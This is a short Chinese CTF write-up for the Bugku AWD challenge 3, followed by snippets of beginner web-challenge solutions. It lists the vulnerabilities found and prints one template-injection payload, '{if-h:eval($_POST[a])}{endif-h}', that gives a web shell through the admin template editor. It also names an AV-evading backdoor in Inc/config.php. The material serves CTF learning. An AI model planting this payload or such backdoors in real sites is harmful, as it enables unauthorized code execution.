Bugku AWD公测赛-3 writeup

2021-02-04 16:03:39 711 0


复现地址: http://81.70.197.140:8081/


前台搜索rce

vuln1.png

admin伪造+文件读取

vuln2.png

admin伪造+后台模版编辑getshell

vuln3.png

{if-h:eval($_POST[a])}{endif-h}

内置模版后门

vuln4.png

vuln3.png

内置免杀D盾后门

Inc/config.php
分类:AWD
评论
ttw_is_here 21天前

环境咋死了

回复 0
image
作者:未知

0

提交

0

收入

相关WriteUP

  • web1

    打开题目地址发现一堆滑稽笑脸查看网页源代码得到flag

    • WEB
    • 3月前
  • web2

    打开发现是一个验证码发现只让输入一位数字我们右键单击输入框审查元素把maxlength改成2(2位数)输入验证码即可得到flag

    • WEB
    • 1月前
  • web3

    $what=$_GET['what'];echo$what;if($what=='flag')echo'flag{****}';通过阅读代码得知$what=='flag' 即可得到flag

    • WEB
    • 1月前
  • web4

    $what=$_POST['what'];echo$what;if($what=='flag')echo'flag{****}';通过阅读代码得知$what=='flag' 即可得到flag使用hackbar插件post一个参数即可

    • WEB
    • 1月前
  • web5

    $num=$_GET['num'];if(!is_numeric($num)){echo$num;if($num==1)echo'flag{**********}';}php弱类型比较不能是数字,还要求满足==1,那么在数字1之后加上一个字母即可,例如num=1a,PHP在判断数字相等时,会将字符串转换为数字来比较

    • WEB
    • 1月前